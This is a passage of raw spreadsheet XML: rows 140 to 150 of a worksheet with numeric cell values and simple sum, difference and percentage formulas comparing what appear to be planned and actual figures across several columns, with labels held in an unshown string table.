    <row r="140" spans="1:43" s="189" customFormat="1" ht="24.75" customHeight="1">
      <c r="A140" s="45" t="s">
        <v>160</v>
      </c>
      <c r="B140" s="46" t="s">
        <v>138</v>
      </c>
      <c r="C140" s="47" t="s">
        <v>1</v>
      </c>
      <c r="D140" s="144"/>
      <c r="E140" s="145"/>
      <c r="F140" s="145"/>
      <c r="G140" s="145"/>
      <c r="H140" s="145"/>
      <c r="I140" s="145"/>
      <c r="J140" s="145"/>
      <c r="K140" s="145"/>
      <c r="L140" s="145"/>
      <c r="M140" s="146">
        <v>75</v>
      </c>
      <c r="N140" s="98">
        <f>P140+T140+X140+AB140+AF140+AI140+AL140</f>
        <v>75</v>
      </c>
      <c r="O140" s="147">
        <f t="shared" si="273"/>
        <v>75</v>
      </c>
      <c r="P140" s="48">
        <v>5</v>
      </c>
      <c r="Q140" s="49"/>
      <c r="R140" s="147">
        <v>5</v>
      </c>
      <c r="S140" s="156"/>
      <c r="T140" s="48">
        <v>12</v>
      </c>
      <c r="U140" s="49"/>
      <c r="V140" s="147">
        <v>12</v>
      </c>
      <c r="W140" s="156"/>
      <c r="X140" s="48"/>
      <c r="Y140" s="49"/>
      <c r="Z140" s="147">
        <v>0</v>
      </c>
      <c r="AA140" s="156"/>
      <c r="AB140" s="48">
        <v>50</v>
      </c>
      <c r="AC140" s="49"/>
      <c r="AD140" s="147">
        <v>50</v>
      </c>
      <c r="AE140" s="156"/>
      <c r="AF140" s="48"/>
      <c r="AG140" s="147"/>
      <c r="AH140" s="156"/>
      <c r="AI140" s="48"/>
      <c r="AJ140" s="147"/>
      <c r="AK140" s="156"/>
      <c r="AL140" s="48">
        <v>8</v>
      </c>
      <c r="AM140" s="147">
        <v>8</v>
      </c>
      <c r="AN140" s="147"/>
      <c r="AO140" s="73">
        <f t="shared" ref="AO140:AO147" si="274">O140/N140*100</f>
        <v>100</v>
      </c>
      <c r="AP140" s="74"/>
      <c r="AQ140" s="148"/>
    </row>
    <row r="141" spans="1:43" ht="22.5" customHeight="1">
      <c r="A141" s="76" t="s">
        <v>31</v>
      </c>
      <c r="B141" s="157" t="s">
        <v>43</v>
      </c>
      <c r="C141" s="69" t="s">
        <v>40</v>
      </c>
      <c r="D141" s="70">
        <f>D142+D147</f>
        <v>120210</v>
      </c>
      <c r="E141" s="71">
        <f>E142+E147</f>
        <v>119358</v>
      </c>
      <c r="F141" s="70">
        <f t="shared" ref="F141:L141" si="275">F142+F147</f>
        <v>12616</v>
      </c>
      <c r="G141" s="70">
        <f t="shared" si="275"/>
        <v>24225</v>
      </c>
      <c r="H141" s="70">
        <f t="shared" si="275"/>
        <v>9229</v>
      </c>
      <c r="I141" s="70">
        <f t="shared" si="275"/>
        <v>18725</v>
      </c>
      <c r="J141" s="70">
        <f t="shared" si="275"/>
        <v>32972</v>
      </c>
      <c r="K141" s="70">
        <f t="shared" si="275"/>
        <v>16029</v>
      </c>
      <c r="L141" s="70">
        <f t="shared" si="275"/>
        <v>7963</v>
      </c>
      <c r="M141" s="77">
        <f>M142+M147</f>
        <v>112692</v>
      </c>
      <c r="N141" s="78">
        <f>N142+N147</f>
        <v>123548</v>
      </c>
      <c r="O141" s="73">
        <f t="shared" ref="O141:P141" si="276">O142+O147</f>
        <v>122956</v>
      </c>
      <c r="P141" s="32">
        <f t="shared" si="276"/>
        <v>12790</v>
      </c>
      <c r="Q141" s="33">
        <v>12616</v>
      </c>
      <c r="R141" s="78">
        <f t="shared" ref="R141:T141" si="277">R142+R147</f>
        <v>12836</v>
      </c>
      <c r="S141" s="33">
        <f t="shared" ref="S141:S147" si="278">R141-Q141</f>
        <v>220</v>
      </c>
      <c r="T141" s="32">
        <f t="shared" si="277"/>
        <v>24569</v>
      </c>
      <c r="U141" s="33">
        <v>24225</v>
      </c>
      <c r="V141" s="78">
        <f t="shared" ref="V141:X141" si="279">V142+V147</f>
        <v>24199</v>
      </c>
      <c r="W141" s="158"/>
      <c r="X141" s="32">
        <f t="shared" si="279"/>
        <v>9373</v>
      </c>
      <c r="Y141" s="33">
        <v>9229</v>
      </c>
      <c r="Z141" s="78">
        <f t="shared" ref="Z141:AB141" si="280">Z142+Z147</f>
        <v>9365</v>
      </c>
      <c r="AA141" s="158"/>
      <c r="AB141" s="32">
        <f t="shared" si="280"/>
        <v>19112</v>
      </c>
      <c r="AC141" s="33"/>
      <c r="AD141" s="78">
        <f t="shared" ref="AD141:AF141" si="281">AD142+AD147</f>
        <v>19074</v>
      </c>
      <c r="AE141" s="158"/>
      <c r="AF141" s="32">
        <f t="shared" si="281"/>
        <v>33422</v>
      </c>
      <c r="AG141" s="78">
        <f t="shared" ref="AG141:AI141" si="282">AG142+AG147</f>
        <v>33134</v>
      </c>
      <c r="AH141" s="158"/>
      <c r="AI141" s="32">
        <f t="shared" si="282"/>
        <v>16146</v>
      </c>
      <c r="AJ141" s="78">
        <f t="shared" ref="AJ141:AL141" si="283">AJ142+AJ147</f>
        <v>16322</v>
      </c>
      <c r="AK141" s="158"/>
      <c r="AL141" s="32">
        <f t="shared" si="283"/>
        <v>8136</v>
      </c>
      <c r="AM141" s="78">
        <f t="shared" ref="AM141" si="284">AM142+AM147</f>
        <v>8026</v>
      </c>
      <c r="AN141" s="78"/>
      <c r="AO141" s="73">
        <f t="shared" si="274"/>
        <v>99.520834007835006</v>
      </c>
      <c r="AP141" s="74">
        <f>O141-M141</f>
        <v>10264</v>
      </c>
      <c r="AQ141" s="80"/>
    </row>
    <row r="142" spans="1:43" ht="22.5" customHeight="1">
      <c r="A142" s="76" t="s">
        <v>9</v>
      </c>
      <c r="B142" s="93" t="s">
        <v>77</v>
      </c>
      <c r="C142" s="115" t="s">
        <v>40</v>
      </c>
      <c r="D142" s="116">
        <f>D143+D144+D145+D146</f>
        <v>36857</v>
      </c>
      <c r="E142" s="71">
        <f>E143+E144+E145+E146</f>
        <v>37460</v>
      </c>
      <c r="F142" s="116">
        <f t="shared" ref="F142:L142" si="285">F143+F144+F145+F146</f>
        <v>5164</v>
      </c>
      <c r="G142" s="116">
        <f t="shared" si="285"/>
        <v>7780</v>
      </c>
      <c r="H142" s="116">
        <f t="shared" si="285"/>
        <v>3686</v>
      </c>
      <c r="I142" s="116">
        <f t="shared" si="285"/>
        <v>7084</v>
      </c>
      <c r="J142" s="116">
        <f t="shared" si="285"/>
        <v>6149</v>
      </c>
      <c r="K142" s="116">
        <f t="shared" si="285"/>
        <v>5044</v>
      </c>
      <c r="L142" s="116">
        <f t="shared" si="285"/>
        <v>3040</v>
      </c>
      <c r="M142" s="159">
        <f>M143+M144+M145+M146</f>
        <v>36129</v>
      </c>
      <c r="N142" s="118">
        <f>N143+N144+N145+N146</f>
        <v>39736</v>
      </c>
      <c r="O142" s="73">
        <f t="shared" ref="O142:P142" si="286">O143+O144+O145+O146</f>
        <v>38760</v>
      </c>
      <c r="P142" s="32">
        <f t="shared" si="286"/>
        <v>5338</v>
      </c>
      <c r="Q142" s="33">
        <v>5164</v>
      </c>
      <c r="R142" s="118">
        <f t="shared" ref="R142:T142" si="287">R143+R144+R145+R146</f>
        <v>5374</v>
      </c>
      <c r="S142" s="33">
        <f t="shared" si="278"/>
        <v>210</v>
      </c>
      <c r="T142" s="32">
        <f t="shared" si="287"/>
        <v>8124</v>
      </c>
      <c r="U142" s="33">
        <v>7780</v>
      </c>
      <c r="V142" s="118">
        <f t="shared" ref="V142:X142" si="288">V143+V144+V145+V146</f>
        <v>8071</v>
      </c>
      <c r="W142" s="57"/>
      <c r="X142" s="32">
        <f t="shared" si="288"/>
        <v>3830</v>
      </c>
      <c r="Y142" s="33">
        <v>3686</v>
      </c>
      <c r="Z142" s="118">
        <f t="shared" ref="Z142:AB142" si="289">Z143+Z144+Z145+Z146</f>
        <v>3822</v>
      </c>
      <c r="AA142" s="57"/>
      <c r="AB142" s="32">
        <f t="shared" si="289"/>
        <v>7471</v>
      </c>
      <c r="AC142" s="33"/>
      <c r="AD142" s="118">
        <f t="shared" ref="AD142:AF142" si="290">AD143+AD144+AD145+AD146</f>
        <v>7404</v>
      </c>
      <c r="AE142" s="57"/>
      <c r="AF142" s="32">
        <f t="shared" si="290"/>
        <v>6599</v>
      </c>
      <c r="AG142" s="118">
        <f t="shared" ref="AG142:AI142" si="291">AG143+AG144+AG145+AG146</f>
        <v>6591</v>
      </c>
      <c r="AH142" s="57"/>
      <c r="AI142" s="32">
        <f t="shared" si="291"/>
        <v>5161</v>
      </c>
      <c r="AJ142" s="118">
        <f t="shared" ref="AJ142:AL142" si="292">AJ143+AJ144+AJ145+AJ146</f>
        <v>4387</v>
      </c>
      <c r="AK142" s="57"/>
      <c r="AL142" s="32">
        <f t="shared" si="292"/>
        <v>3213</v>
      </c>
      <c r="AM142" s="118">
        <f t="shared" ref="AM142" si="293">AM143+AM144+AM145+AM146</f>
        <v>3111</v>
      </c>
      <c r="AN142" s="118"/>
      <c r="AO142" s="73">
        <f t="shared" si="274"/>
        <v>97.543789007449163</v>
      </c>
      <c r="AP142" s="74">
        <f>O142-M142</f>
        <v>2631</v>
      </c>
      <c r="AQ142" s="120"/>
    </row>
    <row r="143" spans="1:43" ht="22.5" customHeight="1">
      <c r="A143" s="68">
        <v>1</v>
      </c>
      <c r="B143" s="81" t="s">
        <v>25</v>
      </c>
      <c r="C143" s="25" t="s">
        <v>40</v>
      </c>
      <c r="D143" s="89">
        <v>164</v>
      </c>
      <c r="E143" s="83">
        <v>150</v>
      </c>
      <c r="F143" s="89">
        <v>90</v>
      </c>
      <c r="G143" s="89">
        <v>3</v>
      </c>
      <c r="H143" s="89">
        <v>38</v>
      </c>
      <c r="I143" s="89">
        <v>0</v>
      </c>
      <c r="J143" s="83">
        <v>3</v>
      </c>
      <c r="K143" s="89">
        <v>8</v>
      </c>
      <c r="L143" s="89">
        <v>2</v>
      </c>
      <c r="M143" s="85">
        <v>144</v>
      </c>
      <c r="N143" s="98">
        <f>P143+T143+X143+AB143+AF143+AI143+AL143</f>
        <v>149</v>
      </c>
      <c r="O143" s="86">
        <f t="shared" ref="O143:O147" si="294">R143+V143+Z143+AD143+AG143+AJ143+AM143</f>
        <v>145</v>
      </c>
      <c r="P143" s="11">
        <v>93</v>
      </c>
      <c r="Q143" s="12">
        <v>90</v>
      </c>
      <c r="R143" s="98">
        <v>91</v>
      </c>
      <c r="S143" s="33">
        <f t="shared" si="278"/>
        <v>1</v>
      </c>
      <c r="T143" s="11">
        <v>3</v>
      </c>
      <c r="U143" s="12">
        <v>3</v>
      </c>
      <c r="V143" s="98">
        <v>3</v>
      </c>
      <c r="W143" s="160"/>
      <c r="X143" s="11">
        <v>40</v>
      </c>
      <c r="Y143" s="12">
        <v>38</v>
      </c>
      <c r="Z143" s="98">
        <v>38</v>
      </c>
      <c r="AA143" s="160"/>
      <c r="AB143" s="11">
        <v>0</v>
      </c>
      <c r="AC143" s="12"/>
      <c r="AD143" s="98">
        <v>0</v>
      </c>
      <c r="AE143" s="160"/>
      <c r="AF143" s="11">
        <v>3</v>
      </c>
      <c r="AG143" s="192">
        <v>3</v>
      </c>
      <c r="AH143" s="161"/>
      <c r="AI143" s="11">
        <v>8</v>
      </c>
      <c r="AJ143" s="98">
        <v>8</v>
      </c>
      <c r="AK143" s="160"/>
      <c r="AL143" s="11">
        <v>2</v>
      </c>
      <c r="AM143" s="98">
        <v>2</v>
      </c>
      <c r="AN143" s="98"/>
      <c r="AO143" s="73">
        <f t="shared" si="274"/>
        <v>97.31543624161074</v>
      </c>
      <c r="AP143" s="74"/>
      <c r="AQ143" s="91"/>
    </row>
    <row r="144" spans="1:43" ht="22.5" customHeight="1">
      <c r="A144" s="68">
        <v>2</v>
      </c>
      <c r="B144" s="81" t="s">
        <v>26</v>
      </c>
      <c r="C144" s="25" t="s">
        <v>40</v>
      </c>
      <c r="D144" s="89">
        <v>10471</v>
      </c>
      <c r="E144" s="83">
        <v>11312</v>
      </c>
      <c r="F144" s="89">
        <f>1955+68</f>
        <v>2023</v>
      </c>
      <c r="G144" s="89">
        <f>1988+28</f>
        <v>2016</v>
      </c>
      <c r="H144" s="89">
        <f>1755+46</f>
        <v>1801</v>
      </c>
      <c r="I144" s="89">
        <v>2150</v>
      </c>
      <c r="J144" s="89">
        <v>1110</v>
      </c>
      <c r="K144" s="89">
        <f>553+55</f>
        <v>608</v>
      </c>
      <c r="L144" s="89">
        <v>886</v>
      </c>
      <c r="M144" s="85">
        <v>10216</v>
      </c>
      <c r="N144" s="98">
        <f>P144+T144+X144+AB144+AF144+AI144+AL144</f>
        <v>11389</v>
      </c>
      <c r="O144" s="86">
        <f t="shared" si="294"/>
        <v>11335</v>
      </c>
      <c r="P144" s="11">
        <f>2015+125</f>
        <v>2140</v>
      </c>
      <c r="Q144" s="12">
        <v>2023</v>
      </c>
      <c r="R144" s="98">
        <v>2167</v>
      </c>
      <c r="S144" s="33">
        <f t="shared" si="278"/>
        <v>144</v>
      </c>
      <c r="T144" s="11">
        <f>1951+150</f>
        <v>2101</v>
      </c>
      <c r="U144" s="12">
        <v>2016</v>
      </c>
      <c r="V144" s="98">
        <v>2098</v>
      </c>
      <c r="W144" s="160"/>
      <c r="X144" s="11">
        <f>1815+110</f>
        <v>1925</v>
      </c>
      <c r="Y144" s="12">
        <v>1801</v>
      </c>
      <c r="Z144" s="98">
        <v>1919</v>
      </c>
      <c r="AA144" s="160"/>
      <c r="AB144" s="11">
        <f>2275+120</f>
        <v>2395</v>
      </c>
      <c r="AC144" s="12"/>
      <c r="AD144" s="98">
        <v>2375</v>
      </c>
      <c r="AE144" s="160"/>
      <c r="AF144" s="11">
        <f>1005+100</f>
        <v>1105</v>
      </c>
      <c r="AG144" s="98">
        <v>1105</v>
      </c>
      <c r="AH144" s="160"/>
      <c r="AI144" s="11">
        <f>638+70</f>
        <v>708</v>
      </c>
      <c r="AJ144" s="98">
        <v>692</v>
      </c>
      <c r="AK144" s="160"/>
      <c r="AL144" s="11">
        <f>935+80</f>
        <v>1015</v>
      </c>
      <c r="AM144" s="98">
        <v>979</v>
      </c>
      <c r="AN144" s="98"/>
      <c r="AO144" s="73">
        <f t="shared" si="274"/>
        <v>99.525858284309422</v>
      </c>
      <c r="AP144" s="74"/>
      <c r="AQ144" s="91"/>
    </row>
    <row r="145" spans="1:43" ht="22.5" customHeight="1">
      <c r="A145" s="68">
        <v>3</v>
      </c>
      <c r="B145" s="81" t="s">
        <v>27</v>
      </c>
      <c r="C145" s="25" t="s">
        <v>40</v>
      </c>
      <c r="D145" s="89">
        <v>22980</v>
      </c>
      <c r="E145" s="83">
        <v>22670</v>
      </c>
      <c r="F145" s="89">
        <v>2196</v>
      </c>
      <c r="G145" s="89">
        <v>5363</v>
      </c>
      <c r="H145" s="89">
        <v>1232</v>
      </c>
      <c r="I145" s="89">
        <v>4724</v>
      </c>
      <c r="J145" s="89">
        <v>4498</v>
      </c>
      <c r="K145" s="89">
        <v>4284</v>
      </c>
      <c r="L145" s="89">
        <v>1589</v>
      </c>
      <c r="M145" s="85">
        <v>22587</v>
      </c>
      <c r="N145" s="98">
        <f>P145+T145+X145+AB145+AF145+AI145+AL145</f>
        <v>24925</v>
      </c>
      <c r="O145" s="86">
        <f t="shared" si="294"/>
        <v>23997</v>
      </c>
      <c r="P145" s="11">
        <f>2280</f>
        <v>2280</v>
      </c>
      <c r="Q145" s="12">
        <v>2196</v>
      </c>
      <c r="R145" s="98">
        <v>2286</v>
      </c>
      <c r="S145" s="33">
        <f t="shared" si="278"/>
        <v>90</v>
      </c>
      <c r="T145" s="11">
        <f>5456+199</f>
        <v>5655</v>
      </c>
      <c r="U145" s="12">
        <v>5363</v>
      </c>
      <c r="V145" s="98">
        <v>5605</v>
      </c>
      <c r="W145" s="160"/>
      <c r="X145" s="11">
        <f>1185+30</f>
        <v>1215</v>
      </c>
      <c r="Y145" s="12">
        <v>1232</v>
      </c>
      <c r="Z145" s="98">
        <v>1215</v>
      </c>
      <c r="AA145" s="160"/>
      <c r="AB145" s="11">
        <f>4535+316</f>
        <v>4851</v>
      </c>
      <c r="AC145" s="12"/>
      <c r="AD145" s="98">
        <v>4804</v>
      </c>
      <c r="AE145" s="160"/>
      <c r="AF145" s="11">
        <f>4568+400</f>
        <v>4968</v>
      </c>
      <c r="AG145" s="98">
        <v>4962</v>
      </c>
      <c r="AH145" s="160"/>
      <c r="AI145" s="11">
        <f>4125+180</f>
        <v>4305</v>
      </c>
      <c r="AJ145" s="98">
        <v>3540</v>
      </c>
      <c r="AK145" s="160"/>
      <c r="AL145" s="11">
        <f>1646+5</f>
        <v>1651</v>
      </c>
      <c r="AM145" s="98">
        <v>1585</v>
      </c>
      <c r="AN145" s="98"/>
      <c r="AO145" s="73">
        <f t="shared" si="274"/>
        <v>96.276830491474414</v>
      </c>
      <c r="AP145" s="74"/>
      <c r="AQ145" s="91"/>
    </row>
    <row r="146" spans="1:43" ht="22.5" customHeight="1">
      <c r="A146" s="68">
        <v>4</v>
      </c>
      <c r="B146" s="81" t="s">
        <v>28</v>
      </c>
      <c r="C146" s="25" t="s">
        <v>40</v>
      </c>
      <c r="D146" s="89">
        <v>3242</v>
      </c>
      <c r="E146" s="83">
        <v>3328</v>
      </c>
      <c r="F146" s="89">
        <v>855</v>
      </c>
      <c r="G146" s="89">
        <v>398</v>
      </c>
      <c r="H146" s="89">
        <v>615</v>
      </c>
      <c r="I146" s="89">
        <v>210</v>
      </c>
      <c r="J146" s="89">
        <v>538</v>
      </c>
      <c r="K146" s="89">
        <v>144</v>
      </c>
      <c r="L146" s="89">
        <v>563</v>
      </c>
      <c r="M146" s="85">
        <v>3182</v>
      </c>
      <c r="N146" s="98">
        <f>P146+T146+X146+AB146+AF146+AI146+AL146</f>
        <v>3273</v>
      </c>
      <c r="O146" s="86">
        <f t="shared" si="294"/>
        <v>3283</v>
      </c>
      <c r="P146" s="11">
        <f>855-30</f>
        <v>825</v>
      </c>
      <c r="Q146" s="12">
        <v>855</v>
      </c>
      <c r="R146" s="98">
        <v>830</v>
      </c>
      <c r="S146" s="33">
        <f t="shared" si="278"/>
        <v>-25</v>
      </c>
      <c r="T146" s="11">
        <f>350+15</f>
        <v>365</v>
      </c>
      <c r="U146" s="12">
        <v>398</v>
      </c>
      <c r="V146" s="98">
        <v>365</v>
      </c>
      <c r="W146" s="160"/>
      <c r="X146" s="11">
        <f>630+20</f>
        <v>650</v>
      </c>
      <c r="Y146" s="12">
        <v>615</v>
      </c>
      <c r="Z146" s="98">
        <v>650</v>
      </c>
      <c r="AA146" s="160"/>
      <c r="AB146" s="11">
        <f>215+10</f>
        <v>225</v>
      </c>
      <c r="AC146" s="12"/>
      <c r="AD146" s="98">
        <v>225</v>
      </c>
      <c r="AE146" s="160"/>
      <c r="AF146" s="11">
        <f>538-15</f>
        <v>523</v>
      </c>
      <c r="AG146" s="98">
        <v>521</v>
      </c>
      <c r="AH146" s="160"/>
      <c r="AI146" s="11">
        <v>140</v>
      </c>
      <c r="AJ146" s="98">
        <v>147</v>
      </c>
      <c r="AK146" s="160"/>
      <c r="AL146" s="11">
        <f>563-18</f>
        <v>545</v>
      </c>
      <c r="AM146" s="98">
        <v>545</v>
      </c>
      <c r="AN146" s="98"/>
      <c r="AO146" s="73">
        <f t="shared" si="274"/>
        <v>100.30553009471433</v>
      </c>
      <c r="AP146" s="74"/>
      <c r="AQ146" s="91"/>
    </row>
    <row r="147" spans="1:43" s="195" customFormat="1" ht="22.5" customHeight="1">
      <c r="A147" s="92" t="s">
        <v>30</v>
      </c>
      <c r="B147" s="93" t="s">
        <v>29</v>
      </c>
      <c r="C147" s="115" t="s">
        <v>40</v>
      </c>
      <c r="D147" s="70">
        <v>83353</v>
      </c>
      <c r="E147" s="71">
        <v>81898</v>
      </c>
      <c r="F147" s="116">
        <f>6975+477</f>
        <v>7452</v>
      </c>
      <c r="G147" s="116">
        <v>16445</v>
      </c>
      <c r="H147" s="116">
        <f>5195+348</f>
        <v>5543</v>
      </c>
      <c r="I147" s="116">
        <f>10910+731</f>
        <v>11641</v>
      </c>
      <c r="J147" s="116">
        <f>25983+840</f>
        <v>26823</v>
      </c>
      <c r="K147" s="116">
        <v>10985</v>
      </c>
      <c r="L147" s="116">
        <v>4923</v>
      </c>
      <c r="M147" s="159">
        <v>76563</v>
      </c>
      <c r="N147" s="118">
        <f>P147+T147+X147+AB147+AF147+AI147+AL147</f>
        <v>83812</v>
      </c>
      <c r="O147" s="73">
        <f t="shared" si="294"/>
        <v>84196</v>
      </c>
      <c r="P147" s="54">
        <v>7452</v>
      </c>
      <c r="Q147" s="55">
        <v>7452</v>
      </c>
      <c r="R147" s="119">
        <v>7462</v>
      </c>
      <c r="S147" s="33">
        <f t="shared" si="278"/>
        <v>10</v>
      </c>
      <c r="T147" s="54">
        <v>16445</v>
      </c>
      <c r="U147" s="55">
        <v>16445</v>
      </c>
      <c r="V147" s="118">
        <v>16128</v>
      </c>
      <c r="W147" s="57"/>
      <c r="X147" s="56">
        <v>5543</v>
      </c>
      <c r="Y147" s="57">
        <v>5543</v>
      </c>
      <c r="Z147" s="118">
        <v>5543</v>
      </c>
      <c r="AA147" s="57"/>
      <c r="AB147" s="56">
        <v>11641</v>
      </c>
      <c r="AC147" s="57"/>
      <c r="AD147" s="118">
        <v>11670</v>
      </c>
      <c r="AE147" s="57"/>
      <c r="AF147" s="56">
        <v>26823</v>
      </c>
      <c r="AG147" s="118">
        <v>26543</v>
      </c>
      <c r="AH147" s="57"/>
      <c r="AI147" s="56">
        <v>10985</v>
      </c>
      <c r="AJ147" s="118">
        <v>11935</v>
      </c>
      <c r="AK147" s="57"/>
      <c r="AL147" s="56">
        <v>4923</v>
      </c>
      <c r="AM147" s="118">
        <v>4915</v>
      </c>
      <c r="AN147" s="118"/>
      <c r="AO147" s="73">
        <f t="shared" si="274"/>
        <v>100.45816828139169</v>
      </c>
      <c r="AP147" s="74">
        <f>O147-M147</f>
        <v>7633</v>
      </c>
      <c r="AQ147" s="120"/>
    </row>
    <row r="148" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A148" s="162" t="s">
        <v>32</v>
      </c>
      <c r="B148" s="163" t="s">
        <v>78</v>
      </c>
      <c r="C148" s="69"/>
      <c r="D148" s="164"/>
      <c r="E148" s="83"/>
      <c r="F148" s="70"/>
      <c r="G148" s="70"/>
      <c r="H148" s="70"/>
      <c r="I148" s="70"/>
      <c r="J148" s="70"/>
      <c r="K148" s="70"/>
      <c r="L148" s="70"/>
      <c r="M148" s="77"/>
      <c r="N148" s="78"/>
      <c r="O148" s="86"/>
      <c r="P148" s="86"/>
      <c r="Q148" s="86"/>
      <c r="R148" s="79"/>
      <c r="S148" s="79"/>
      <c r="T148" s="86"/>
      <c r="U148" s="86"/>
      <c r="V148" s="79"/>
      <c r="W148" s="79"/>
      <c r="X148" s="86"/>
      <c r="Y148" s="86"/>
      <c r="Z148" s="79"/>
      <c r="AA148" s="79"/>
      <c r="AB148" s="86"/>
      <c r="AC148" s="86"/>
      <c r="AD148" s="79"/>
      <c r="AE148" s="79"/>
      <c r="AF148" s="86"/>
      <c r="AG148" s="79"/>
      <c r="AH148" s="79"/>
      <c r="AI148" s="86"/>
      <c r="AJ148" s="79"/>
      <c r="AK148" s="79"/>
      <c r="AL148" s="86"/>
      <c r="AM148" s="79"/>
      <c r="AN148" s="79"/>
      <c r="AO148" s="73"/>
      <c r="AP148" s="74"/>
      <c r="AQ148" s="80"/>
    </row>
    <row r="149" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A149" s="162" t="s">
        <v>63</v>
      </c>
      <c r="B149" s="163" t="s">
        <v>79</v>
      </c>
      <c r="C149" s="69" t="s">
        <v>36</v>
      </c>
      <c r="D149" s="134">
        <f>D151+D158</f>
        <v>191.11999999999998</v>
      </c>
      <c r="E149" s="71">
        <f>E151+E158</f>
        <v>186.15033</v>
      </c>
      <c r="F149" s="134">
        <f t="shared" ref="F149:L149" si="295">F151+F158</f>
        <v>8.25</v>
      </c>
      <c r="G149" s="134">
        <f t="shared" si="295"/>
        <v>59.160600000000017</v>
      </c>
      <c r="H149" s="134">
        <f t="shared" si="295"/>
        <v>14.790999999999999</v>
      </c>
      <c r="I149" s="134">
        <f t="shared" si="295"/>
        <v>18.987000000000002</v>
      </c>
      <c r="J149" s="134">
        <f t="shared" si="295"/>
        <v>46</v>
      </c>
      <c r="K149" s="134">
        <f t="shared" si="295"/>
        <v>22.57</v>
      </c>
      <c r="L149" s="134">
        <f t="shared" si="295"/>
        <v>20.553000000000001</v>
      </c>
      <c r="M149" s="165">
        <f>M151+M158</f>
        <v>138.91999999999999</v>
      </c>
      <c r="N149" s="205">
        <v>193</v>
      </c>
      <c r="O149" s="73">
        <f>O151+O158</f>
        <v>161.31</v>
      </c>
      <c r="P149" s="32">
        <f t="shared" ref="P149" si="296">P151+P158</f>
        <v>8.25</v>
      </c>
      <c r="Q149" s="33">
        <v>8.25</v>
      </c>
      <c r="R149" s="142">
        <f t="shared" ref="R149:T149" si="297">R151+R158</f>
        <v>6.6300000000000008</v>
      </c>
      <c r="S149" s="166"/>
      <c r="T149" s="32">
        <f t="shared" si="297"/>
        <v>59.430000000000007</v>
      </c>
      <c r="U149" s="33">
        <v>59.160600000000017</v>
      </c>
      <c r="V149" s="142">
        <f t="shared" ref="V149:X149" si="298">V151+V158</f>
        <v>49.82</v>
      </c>
      <c r="W149" s="166"/>
      <c r="X149" s="32">
        <f t="shared" si="298"/>
        <v>15.149999999999999</v>
      </c>
      <c r="Y149" s="33">
        <v>14.790999999999999</v>
      </c>
      <c r="Z149" s="142">
        <f t="shared" ref="Z149:AB149" si="299">Z151+Z158</f>
        <v>12.979999999999999</v>
      </c>
      <c r="AA149" s="166"/>
      <c r="AB149" s="32">
        <f t="shared" si="299"/>
        <v>20.516000000000002</v>
      </c>
      <c r="AC149" s="33"/>
      <c r="AD149" s="142">
        <f t="shared" ref="AD149:AF149" si="300">AD151+AD158</f>
        <v>17.66</v>
      </c>
      <c r="AE149" s="166"/>
      <c r="AF149" s="32">
        <f t="shared" si="300"/>
        <v>45.5</v>
      </c>
      <c r="AG149" s="142">
        <f t="shared" ref="AG149:AI149" si="301">AG151+AG158</f>
        <v>37.279999999999994</v>
      </c>
      <c r="AH149" s="166"/>
      <c r="AI149" s="32">
        <f t="shared" si="301"/>
        <v>12.43</v>
      </c>
      <c r="AJ149" s="142">
        <f t="shared" ref="AJ149:AL149" si="302">AJ151+AJ158</f>
        <v>18.18</v>
      </c>
      <c r="AK149" s="166"/>
      <c r="AL149" s="32">
        <f t="shared" si="302"/>
        <v>21.45093</v>
      </c>
      <c r="AM149" s="142">
        <f t="shared" ref="AM149" si="303">AM151+AM158</f>
        <v>18.760000000000002</v>
      </c>
      <c r="AN149" s="142"/>
      <c r="AO149" s="73">
        <f t="shared" ref="AO149:AO158" si="304">O149/N149*100</f>
        <v>83.580310880829018</v>
      </c>
      <c r="AP149" s="74">
        <f t="shared" ref="AP149:AP158" si="305">O149-M149</f>
        <v>22.390000000000015</v>
      </c>
      <c r="AQ149" s="143"/>
    </row>
    <row r="150" spans="1:43" ht="22.5" customHeight="1">
      <c r="A150" s="162" t="s">
        <v>9</v>
      </c>
      <c r="B150" s="163" t="s">
        <v>120</v>
      </c>
      <c r="C150" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D150" s="134">
        <f>D152+D155</f>
        <v>61</v>
      </c>
      <c r="E150" s="83">
        <f>E152+E155</f>
        <v>61.17</v>
      </c>
      <c r="F150" s="71">
        <f>F152+F155</f>
        <v>1.5</v>
      </c>
      <c r="G150" s="71">
        <f t="shared" ref="G150:L150" si="306">G152+G155</f>
        <v>13.9</v>
      </c>
      <c r="H150" s="71">
        <f t="shared" si="306"/>
        <v>4.59</v>
      </c>
      <c r="I150" s="71">
        <f t="shared" si="306"/>
        <v>4.95</v>
      </c>
      <c r="J150" s="71">
        <f t="shared" si="306"/>
        <v>10</v>
      </c>
      <c r="K150" s="71">
        <f t="shared" si="306"/>
        <v>4.3</v>
      </c>
      <c r="L150" s="71">
        <f t="shared" si="306"/>
        <v>22.59</v>
      </c>
      <c r="M150" s="72">
        <f>M152+M155</f>
        <v>61.17</v>
      </c>
      <c r="N150" s="192">
        <v>62</v>
      </c>
      <c r="O150" s="86">
        <f>O152+O155</f>
        <v>62.1</v>
      </c>
      <c r="P150" s="32">
        <f t="shared" ref="P150" si="307">P152+P155</f>
        <v>1.5</v>
      </c>
      <c r="Q150" s="33">
        <v>1.5</v>
      </c>
      <c r="R150" s="73">
        <f>R152+R155</f>
        <v>1.5</v>
      </c>
      <c r="S150" s="33"/>
      <c r="T150" s="32">
        <f t="shared" ref="T150" si="308">T152+T155</f>
        <v>13.9</v>
      </c>
      <c r="U150" s="33">
        <v>13.9</v>
      </c>
      <c r="V150" s="73">
        <f t="shared" ref="V150:X150" si="309">V152+V155</f>
        <v>13.9</v>
      </c>
      <c r="W150" s="33"/>
      <c r="X150" s="32">
        <f t="shared" si="309"/>
        <v>4.59</v>
      </c>
      <c r="Y150" s="33">
        <v>4.59</v>
      </c>
      <c r="Z150" s="73">
        <f t="shared" ref="Z150:AB150" si="310">Z152+Z155</f>
        <v>4.59</v>
      </c>
      <c r="AA150" s="33"/>
      <c r="AB150" s="32">
        <f t="shared" si="310"/>
        <v>4.96</v>
      </c>
      <c r="AC150" s="33"/>
      <c r="AD150" s="73">
        <f t="shared" ref="AD150:AF150" si="311">AD152+AD155</f>
        <v>4.95</v>
      </c>
      <c r="AE150" s="33"/>
      <c r="AF150" s="32">
        <f t="shared" si="311"/>
        <v>10</v>
      </c>
      <c r="AG150" s="73">
        <f t="shared" ref="AG150:AI150" si="312">AG152+AG155</f>
